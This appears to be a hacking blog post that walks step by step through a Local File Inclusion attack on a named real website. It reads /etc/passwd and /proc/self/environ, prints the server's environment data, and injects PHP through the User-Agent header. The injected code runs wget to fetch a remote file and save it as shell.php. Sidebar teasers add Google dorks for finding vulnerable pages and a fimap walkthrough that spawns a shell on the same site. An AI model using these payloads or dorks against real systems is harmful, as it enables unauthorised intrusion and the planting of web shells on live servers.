Local File Inclusion Example 1





Step1) Find a LFI Vulnerable site

      example : http://somesite.com/something.php?something=something.something

Step 2) To find if the given site is vulnerable for LFI we shall insert the following /etc/passwd and find out the result of the site

Example : http://egenerationglobal.com/index.php?page=/etc/passwd


Now we are sure that this site is vulnerable for LFI (LOCAL FILE INCLUSION)


Step 3 ) http://egenerationglobal.com/index.php?page=/proc/self/environ


DOCUMENT_ROOT=/home/egenerat/public_html
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=text/html,application/xhtmlxml,application/xml;
q=0.9,*/*;
q=0.8
HTTP_ACCEPT_CHARSET=ISO-8859-1,utf-;q=0.7,*;q=0.7
HTTP_ACCEPT_ENCODING=gzip, deflate
HTTP_ACCEPT_LANGUAGE=en-us,en;q=0.5
HTTP_CONNECTION=keep-alive
HTTP_HOST=egenerationglobal.com
HTTP_KEEP_ALIVE=115

HTTP_USER_AGENT=Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
PATH=/bin:/usr/bin
QUERY_STRING=page=/proc/self/environ
REDIRECT_STATUS=200
REMOTE_ADDR=183.82.180.221
REMOTE_PORT=7173
REQUEST_METHOD=GET
REQUEST_URI=/index.php?page=/proc/self/environ
SCRIPT_FILENAME=/home/egenerat/public_html/index.php
SCRIPT_NAME=/index.php
SERVER_ADDR=173.192.220.102
SERVER_ADMIN=webmaster@egenerationglobal.comSERVER_NAME=egenerationglobal.comSERVER_PORT=80SERVER_PROTOCOL=HTTP/1.1SERVER_SIGNATURE=
Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_perl/2.0.4 Perl/v5.8.8 Server at egenerationglobal.com Port 80
SERVER_SOFTWARE=Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_perl/2.0.4




 Now change the USE AGENT





with some php code

 <?php system('wget "http://www.gurujiathome.com/1.txt" -O shell.php'); ?>

Comments

Post a Comment

Popular posts from this blog

Google Dorks For Parameters

Image
inurl:index.php?id= inurl:trainers.php?id= inurl:buy.php?category= inurl:article.php?ID= inurl:play_old.php?id= inurl:declaration_more.php?decl_id= inurl:pageid= inurl:games.php?id= inurl:page.php?file= inurl:newsDetail.php?id= inurl:gallery.php?id= inurl:show.php?id= inurl:staff_id= inurl:newsitem.php?num= inurl:readnews.php?id= inurl:top10.php?cat= inurl:historialeer.php?num= inurl:reagir.php?num= inurl:Stray-Questions-View.php?num= inurl:forum_bds.php?num= inurl:game.php?id= inurl:view_product.php?id= inurl:newsone.php?id= inurl:sw_comment.php?id= inurl:news.php?id= inurl:avd_start.php?avd= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl:news_view.php?id= inurl:select_biblio.php?id= inurl:humor.php?id= inurl:aboutbook.php?id= inurl:ogl_inet.php?ogl_id= inurl:fiche_spectacle.php?id= inurl:communique_detail.php?id= inurl:sem.php3?id= inurl:kategor...
Read more

Local File Inclusion Example 3

Image
step by step LFI: step 1:              the vulnurable link is              http://www.egenerationglobal.com/index.php?page=offshore_software_development.php         step 2:              scan it with fimap                 disktop/fi>fimap.py -u "http://www.egenerationglobal.com/index.php?page=offshore_software_development.php" step 3:     exploit with fimap     disktop/fi>fimap.py -x "http://www.egenerationglobal.com/index.php?page=offshore_software_development.php"   step 4:     now it will ask to choose a domain we wanna exploit juz choose a number step 5:     it will ask for the two available attack so we need to choose any one     Spawn Shell                       ...
Read more